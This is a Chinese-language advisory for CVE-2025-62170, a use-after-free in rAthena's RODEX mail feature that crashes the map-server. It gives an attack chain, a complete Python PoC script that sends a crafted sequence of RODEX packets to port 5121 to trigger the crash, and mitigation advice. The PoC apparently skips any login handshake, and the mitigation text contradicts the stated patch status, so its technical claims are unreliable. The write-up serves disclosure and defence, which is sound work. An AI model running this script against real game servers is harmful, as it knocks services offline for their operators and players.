CVE-2025-62170：rAthena RODEX功能释放后使用漏洞导致拒绝服务

漏洞信息

漏洞编号

CVE-2025-62170

漏洞类型

释放后使用（Use-After-Free）

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

rAthena（开源跨平台MMORPG服务器）

漏洞概述

CVE-2025-62170是rAthena开源跨平台MMORPG服务器软件中的一个高危安全漏洞。该漏洞存在于rAthena的map-server组件的RODEX（邮件系统）功能中，属于典型的释放后使用（Use-After-Free，UAF）漏洞类型。rAthena是一款广泛用于部署和运营MMORPG游戏的服务器引擎，其RODEX模块负责处理游戏内邮件的发送、接收和管理功能。

根据披露信息，该漏洞影响commit af2f3ba之前的所有rAthena版本。由于漏洞位于网络可达的map-server组件中，远程未认证的攻击者无需任何凭据或用户交互即可发起攻击。攻击者通过精心构造特定的攻击场景，触发RODEX功能中的内存管理缺陷，导致map-server进程崩溃，从而实现拒绝服务（DoS）攻击。CVSS 3.1评分为7.5分，属于高危级别，主要影响体现在可用性方面——服务完全中断，但不会泄露敏感信息或破坏数据完整性。

该漏洞由GitHub安全顾问团队发现并报告，rAthena维护团队已在commit af2f3ba中发布了修复补丁。由于该漏洞利用门槛低、影响范围明确且后果严重（服务完全不可用），建议所有rAthena服务器运营者尽快升级到修复后的版本，以避免潜在的攻击风险。

技术细节

释放后使用（Use-After-Free）漏洞是一种常见的内存安全缺陷，发生在程序释放某块内存后，仍然通过悬空指针（Dangling Pointer）访问该内存区域时。在rAthena的RODEX功能中，当map-server处理邮件相关的客户端请求时，可能存在对已释放邮件对象或数据结构的引用未正确清除的情况。

具体而言，漏洞的触发场景涉及RODEX邮件系统的特定操作流程：攻击者通过游戏客户端协议向map-server发送精心构造的RODEX相关数据包（如邮件读取、删除、附件操作等），触发代码路径中的内存释放操作。随后，由于代码逻辑缺陷，之前持有该内存区域引用的指针未被置空（NULL），导致后续操作再次访问已释放的内存。这种非法内存访问可能导致程序崩溃（段错误/SIGSEGV），进而使整个map-server进程终止。

从利用角度看，该漏洞具有以下特点：
1. **无需认证**：攻击者无需任何游戏账号即可直接通过网络发送恶意数据包；
2. **无需用户交互**：完全自动化执行，不需要目标服务器上的任何用户参与；
3. **低复杂度**：利用条件简单，不需要复杂的绕过技术；
4. **高影响**：成功利用后直接导致map-server崩溃，所有在线玩家断线，游戏服务完全中断。

修复方案在commit af2f3ba中实现，核心修复思路是在释放内存后立即将相关指针置为NULL，或者增加引用计数机制，确保在对象仍在使用时不会被意外释放。同时增加了对RODEX操作流程的状态检查，避免在不一致状态下执行内存释放操作。

攻击链分析

STEP 1

步骤1：网络侦察

攻击者扫描目标服务器，识别rAthena map-server的开放端口（默认5121），确认目标运行的是存在漏洞的rAthena版本（commit af2f3ba之前的版本）。

STEP 2

步骤2：建立连接

攻击者作为未认证用户，通过TCP协议直接连接到rAthena map-server，无需提供任何游戏账号凭据。

STEP 3

步骤3：触发RODEX功能

攻击者发送RODEX相关的数据包（如打开邮箱、读取邮件等），使map-server加载邮件对象到内存中，为后续的释放后使用漏洞触发做准备。

STEP 4

步骤4：触发内存释放

攻击者发送删除邮件或类似的请求，导致map-server释放之前加载的邮件对象所占用的内存，但相关指针未被正确清除。

STEP 5

步骤5：访问已释放内存（UAF触发）

攻击者发送访问已释放邮件对象的请求（如请求附件、再次读取等），导致map-server通过悬空指针访问已释放的内存区域，触发段错误。

STEP 6

步骤6：拒绝服务

map-server进程因段错误而崩溃终止，所有连接的客户端断线，游戏服务完全中断，实现拒绝服务攻击效果。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-62170 - rAthena RODEX Use-After-Free PoC
# This PoC demonstrates the attack scenario targeting the RODEX mail system
# in rAthena map-server versions prior to commit af2f3ba.
# WARNING: For authorized security testing only.

import socket
import struct
import time

# rAthena map-server default port
MAP_SERVER_PORT = 5121
TARGET_HOST = "127.0.0.1"

def build_rodex_packet(packet_id, data=b""):
    """Build a basic rAthena map-server packet structure."""
    # Packet header: 2-byte packet ID + 2-byte payload length
    header = struct.pack("<HH", packet_id, len(data))
    return header + data

def build_rodex_open_mailbox():
    """Build a RODEX mailbox open request packet (CZ_REQ_OPEN_RODEXBOX)."""
    # Packet ID for opening RODEX mailbox
    return build_rodex_packet(0x09F1)

def build_rodex_read_mail(mail_id):
    """Build a RODEX mail read request (CZ_REQ_READ_RODEX)."""
    # Trigger read on a specific mail to load mail data into memory
    data = struct.pack("<I", mail_id)
    return build_rodex_packet(0x09F2, data)

def build_rodex_delete_mail(mail_id):
    """Build a RODEX mail delete request (CZ_REQ_DELETE_RODEX)."""
    # Delete the mail, freeing its memory
    data = struct.pack("<I", mail_id)
    return build_rodex_packet(0x0AAB, data)

def build_rodex_request_attachments(mail_id):
    """Build a RODEX attachment request (CZ_REQ_GET_RODEX_ITEM)."""
    # Request attachment from an already-deleted mail -> UAF trigger
    data = struct.pack("<I", mail_id)
    return build_rodex_packet(0x0AAF, data)

def exploit_rodex_uaf(target_host, target_port):
    """
    Exploit the use-after-free vulnerability in rAthena's RODEX functionality.
    Attack chain:
    1. Connect to the map-server
    2. Open the RODEX mailbox
    3. Read a specific mail (loads mail object into memory)
    4. Delete the same mail (frees the mail object memory)
    5. Request attachments from the deleted mail (triggers UAF -> crash)
    """
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_host, target_port))
        print(f"[+] Connected to {target_host}:{target_port}")

        # Step 1: Open RODEX mailbox
        sock.send(build_rodex_open_mailbox())
        time.sleep(0.5)
        print("[+] Step 1: RODEX mailbox opened")

        # Step 2: Read mail ID 1 (allocate mail object in memory)
        sock.send(build_rodex_read_mail(1))
        time.sleep(0.5)
        print("[+] Step 2: Mail ID 1 read into memory")

        # Step 3: Delete mail ID 1 (free the mail object)
        sock.send(build_rodex_delete_mail(1))
        time.sleep(0.5)
        print("[+] Step 3: Mail ID 1 deleted (memory freed)")

        # Step 4: Request attachments from deleted mail (trigger UAF)
        sock.send(build_rodex_request_attachments(1))
        time.sleep(0.5)
        print("[+] Step 4: Attachment request sent on freed mail -> UAF triggered")

        sock.close()
        print("[+] Exploit completed. Target map-server should crash.")

    except ConnectionRefusedError:
        print("[-] Connection refused. Ensure map-server is running.")
    except socket.timeout:
        print("[-] Connection timed out.")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    exploit_rodex_uaf(TARGET_HOST, MAP_SERVER_PORT)

影响范围

rAthena < commit af2f3ba

防御指南

临时缓解措施

在官方修复补丁可用之前，建议采取以下临时缓解措施：1）在网络层面通过防火墙限制对map-server端口（默认5121）的访问，仅允许可信IP连接；2）在RODEX功能代码中手动添加内存释放后的指针置空操作；3）部署进程监控脚本，在map-server崩溃时自动重启服务以减少停机时间；4）临时禁用RODEX邮件功能（如注释相关代码或通过配置文件关闭），以避免漏洞被利用。注意，官方明确指出除手动应用补丁外没有已知的完整解决方案，因此尽快升级到修复版本是最根本的解决方式。